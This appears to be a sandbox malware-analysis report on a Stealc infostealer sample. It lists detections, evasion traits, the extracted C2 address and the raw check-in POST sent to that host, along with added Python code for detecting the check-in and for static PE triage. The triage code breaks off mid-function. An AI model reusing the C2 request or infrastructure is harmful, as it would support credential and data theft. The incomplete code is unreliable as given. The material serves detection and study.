Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1541095
MD5:3232476789303ec2731e9ccce8937fea
SHA1:9d2054302efc53083547e139d7f8a7487e909c89
SHA256:8e46ac374c025d82eb6c7c0db64706ce2546735b1dc5758087fb6fbe9041af84
Tags:exeuser-Bitsight

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3884 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3232476789303EC2731E9CCCE8937FEA)
  • cleanup
Malware family: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Extracted malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (PCAP)
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Yara matches (memory dumps)
Source | Rule | Description | Author
00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 3884 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 3884 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Yara matches (unpacked PE files)
Source | Rule | Description | Author
0.2.file.exe.af0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T12:11:08.098877+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.af0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B08EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected (no User-Agent header):
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (the C2 check-in; no User-Agent header; the body is the report's raw hex decoded with CRLFs restored, 210 bytes as declared):
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHC
    Host: 185.215.113.37
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache

    ------CAFBGHIDBGHJJKFHJDHC
    Content-Disposition: form-data; name="hwid"

    A0572A28D267943400063
    ------CAFBGHIDBGHJJKFHJDHC
    Content-Disposition: form-data; name="build"

    doma
    ------CAFBGHIDBGHJJKFHJDHC--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times; the C2 is contacted by hard-coded IP)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2182986141.00000000018E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2182986141.00000000018E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.0000000001915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.00000000018D2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%M
Source: file.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpqM
Source: file.exe, 00000000.00000002.2182986141.00000000018E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/l
Source: file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37G
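
The POST shown above is the Stealc check-in that Suricata rule 2044243 fires on. The following Python is an added example (it is not part of the Joe Sandbox report and not Stealc's or Joe Security's code): it rebuilds the request from the report's Data Ascii dump, parses it, and scores the traits a detection engineer can key on from this capture: no User-Agent header, a bare-IP Host, a multipart body carrying only the hwid and build fields, a boundary of four dashes plus 20 uppercase letters, and a 16-hex-character .php gate. The benign control request, its host name and path, and the threshold of three indicators are assumptions of this example, not findings of the report.

```python
import re
from dataclasses import dataclass

# Boundary and body reconstructed from the report's "Data Ascii" / "Data Raw"
# dump (CRLFs restored); the hwid and build values are the report's own.
BOUNDARY = "----CAFBGHIDBGHJJKFHJDHC"
CHECKIN_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    "A0572A28D267943400063\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="build"\r\n\r\n'
    "doma\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()
CHECKIN_REQUEST = (
    "POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "Host: 185.215.113.37\r\n"
    f"Content-Length: {len(CHECKIN_BODY)}\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n"
).encode() + CHECKIN_BODY

# Constructed benign control: a browser form post to a hypothetical site.
BENIGN_REQUEST = (
    "POST /account/login HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\n\r\n"
    "------WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
    'Content-Disposition: form-data; name="username"\r\n\r\nalice\r\n'
    "------WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
    'Content-Disposition: form-data; name="remember"\r\n\r\n1\r\n'
    "------WebKitFormBoundary7MA4YWxkTrZu0gW--\r\n"
).encode()


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict[str, str]   # header names lower-cased
    fields: dict[str, str]    # multipart form fields, if any


def parse_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.1 request parser with multipart/form-data support."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = {}
    ctype = headers.get("content-type", "")
    m = re.search(r'boundary="?([^";]+)"?', ctype)
    if ctype.startswith("multipart/form-data") and m:
        delimiter = b"--" + m.group(1).encode()
        for part in body.split(delimiter)[1:]:
            if part.startswith(b"--"):
                break                                   # closing delimiter
            part_head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
            fm = re.search(r'name="([^"]*)"', part_head.decode("latin-1"))
            if fm:
                fields[fm.group(1)] = value.removesuffix(b"\r\n").decode("latin-1")
    return HttpRequest(method, path, headers, fields)


def stealc_checkin_indicators(req: HttpRequest) -> list[str]:
    """Traits of the check-in seen in this report; the patterns are derived
    from this single capture, not from the Suricata rule."""
    hits = []
    if req.method == "POST" and re.fullmatch(r"/[0-9a-f]{16}\.php", req.path):
        hits.append("POST to a 16-hex-character .php gate")
    if "user-agent" not in req.headers:
        hits.append("no User-Agent header")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", req.headers.get("host", "")):
        hits.append("Host is a bare IP address (no DNS lookup needed)")
    if re.search(r"boundary=-{4}[A-Z]{20}$", req.headers.get("content-type", "")):
        hits.append("boundary of four dashes plus 20 uppercase letters")
    if set(req.fields) == {"hwid", "build"}:
        hits.append("multipart body carrying only hwid and build")
    return hits


def is_stealc_checkin(raw: bytes, threshold: int = 3) -> bool:
    """Triage flag: three or more traits together (threshold is an assumption)."""
    return len(stealc_checkin_indicators(parse_request(raw))) >= threshold


if __name__ == "__main__":
    for label, raw in (("sandbox capture", CHECKIN_REQUEST), ("benign control", BENIGN_REQUEST)):
        req = parse_request(raw)
        print(label, req.fields, stealc_checkin_indicators(req))
```

Running the file prints the parsed fields and indicator list for both requests. In a proxy-log or pcap pipeline, feed parse_request each reassembled request and treat is_stealc_checkin as a triage flag rather than a verdict: a single trait such as a missing User-Agent is common in legitimate tooling, which is why the score requires several to coincide.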

                System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB51E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EBB9A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB1954
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAC92D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAB112
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB827D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAE333
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB331D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA2C70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E9043A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D9FD81
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB9D46
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA9E65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E0CFF5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F257B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6879F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB6774
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00AF45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: oxbstytm ZLIB complexity 0.9948882211538461
Source: file.exe, 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B08680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B03720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\42GZ7YUB.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 47%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1820160 > 1048576
Source: file.exe | Static PE information: Raw size of oxbstytm is bigger than: 0x100000 < 0x196400

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.af0000.0.unpack; section rights in the unpacked image: (blank):EW; .rsrc:W; .idata:W; (blank):EW; oxbstytm:EW; yzvcyrux:EW; .taggant:EW; vs the original file: (blank):ER; .rsrc:W; .idata:W; (blank):EW; oxbstytm:EW; yzvcyrux:EW; .taggant:EW (the first, blank-named section changes from execute/read to execute/write)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c612d should be: 0x1c6f15
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: oxbstytm
Source: file.exe | Static PE information: section name: yzvcyrux
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F138FF push ebp; mov dword ptr [esp], edx (at 0_2_00F13909)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F388D5 push 6AD28FF2h; mov dword ptr [esp], ecx (at 0_2_00F3895E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F388D5 push 5ED95401h; mov dword ptr [esp], edx (at 0_2_00F389A9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F388D5 push ebp; mov dword ptr [esp], eax (at 0_2_00F389CE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push esi; mov dword ptr [esp], 7F1C28C1h (at 0_2_00EB090B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push edx; mov dword ptr [esp], ebp (at 0_2_00EB09FB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push edi; mov dword ptr [esp], edx (at 0_2_00EB0A29)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push eax; mov dword ptr [esp], edx (at 0_2_00EB0A91)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], eax (at 0_2_00EB0B49)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push esi; mov dword ptr [esp], esp (at 0_2_00EB0B73)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push 68F7BF9Eh; mov dword ptr [esp], ebx (at 0_2_00EB0C9D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push edi; mov dword ptr [esp], eax (at 0_2_00EB0CCD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push 7D942431h; mov dword ptr [esp], ecx (at 0_2_00EB0D20)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push esi; mov dword ptr [esp], eax (at 0_2_00EB0D53)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push 0A548464h; mov dword ptr [esp], edx (at 0_2_00EB0D74)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], eax (at 0_2_00EB0DEC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push 0770DB0Bh; mov dword ptr [esp], ecx (at 0_2_00EB0E10)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push 5C0CC3EBh; mov dword ptr [esp], eax (at 0_2_00EB0E29)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push edx; mov dword ptr [esp], ebp (at 0_2_00EB0E4B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push 06CF39DFh; mov dword ptr [esp], ebp (at 0_2_00EB0EAD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], ebp (at 0_2_00EB0EE9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push 4C65E077h; mov dword ptr [esp], ebx (at 0_2_00EB0F64)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push 5AF5E3FBh; mov dword ptr [esp], ebx (at 0_2_00EB0F8C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push eax; mov dword ptr [esp], ecx (at 0_2_00EB100C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push 70C116A9h; mov dword ptr [esp], eax (at 0_2_00EB108F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push 3B2BA97Dh; mov dword ptr [esp], eax (at 0_2_00EB10E7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push esi; mov dword ptr [esp], esp (at 0_2_00EB1111)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], 1435C863h (at 0_2_00EB112E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB08C0 push eax; mov dword ptr [esp], esp (at 0_2_00EB11D4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01179174 push 0AB5F4ABh; mov dword ptr [esp], edx (at 0_2_0117919E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01179174 push eax; mov dword ptr [esp], ecx (at 0_2_011791C3)
Source: file.exe | Static PE information: section name: oxbstytm entropy: 7.954384653876487
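
The static findings above (blank and non-standard section names, a high-entropy oxbstytm section, an entry point inside .taggant, and a CheckSum field that does not match the file) can be reproduced without a sandbox. The following Python is an added example and not code from the report: it builds a small PE32 image in memory with the same kind of section layout (constructed bytes, not the analysed file), then parses the headers, computes per-section Shannon entropy, locates the section holding the entry point, and recomputes the PE CheckSum with the imagehlp algorithm. The stored CheckSum value passed in is the report's "real checksum" used only as a placeholder; every other value in the constructed image is invented for the example.

```python
import math
import struct
from collections import Counter

# Section names a linker normally emits; anything else is worth a look.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".xdata", ".CRT"}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: packed or encrypted data sits close to 8.0."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE CheckSum as imagehlp's CheckSumMappedFile computes it: sum every
    dword except the CheckSum field with end-around carry, fold to 16 bits,
    then add the file length."""
    total = 0
    padded = data + bytes((-len(data)) % 4)
    for off in range(0, len(padded), 4):
        if off == (checksum_offset & ~3):
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def triage(data: bytes) -> dict:
    """Static checks on a raw PE image, mirroring the report's findings."""
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24                                   # optional header
    magic, = struct.unpack_from("<H", data, opt)
    entry_rva, = struct.unpack_from("<I", data, opt + 16)
    stored, = struct.unpack_from("<I", data, opt + 64)
    computed = pe_checksum(data, opt + 64)
    findings, sections, entry_section = [], [], None
    for i in range(nsec):
        raw_name, vsize, va, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + i * 40)
        name = raw_name.rstrip(b"\0").decode("latin-1")
        h = shannon_entropy(data[rawptr:rawptr + rawsize])
        sections.append((name, h))
        if not name or not all(c.isascii() and (c.isalnum() or c in "._") for c in name):
            findings.append(f"section name blank or with special chars: {name!r}")
        elif name not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {name}")
        if h > 7.0:
            findings.append(f"high-entropy section {name!r}: {h:.2f} bits/byte")
        if va <= entry_rva < va + max(vsize, rawsize):
            entry_section = name
    if entry_section not in STANDARD_SECTIONS:
        findings.append(f"entry point in {entry_section!r}, outside standard sections")
    if stored != computed:
        findings.append(f"checksum mismatch: header 0x{stored:x}, computed 0x{computed:x}")
    return {"is_pe32": magic == 0x10B, "sections": sections, "entry_section": entry_section,
            "stored_checksum": stored, "computed_checksum": computed, "findings": findings}

def build_sample_pe(stored_checksum: int) -> bytes:
    """Constructed PE32 with a layout like the report's (hypothetical bytes,
    not the analysed file): a blank-named section, .idata, a packed
    'oxbstytm' section and a '.taggant' section holding the entry point."""
    file_align, sect_align = 0x200, 0x1000
    sections = [
        (b"", bytes(0x200)),
        (b".idata", bytes(0x200)),
        (b"oxbstytm", bytes(range(256)) * 4),            # uniform bytes: 8.0 bits/byte
        (b".taggant", b"\x55\x8b\xec\x33\xc0\x5d\xc3".ljust(0x200, b"\xcc")),
    ]
    entry_rva = sect_align * len(sections)                # start of .taggant
    dos = bytearray(64)
    dos[:2] = b"MZ"
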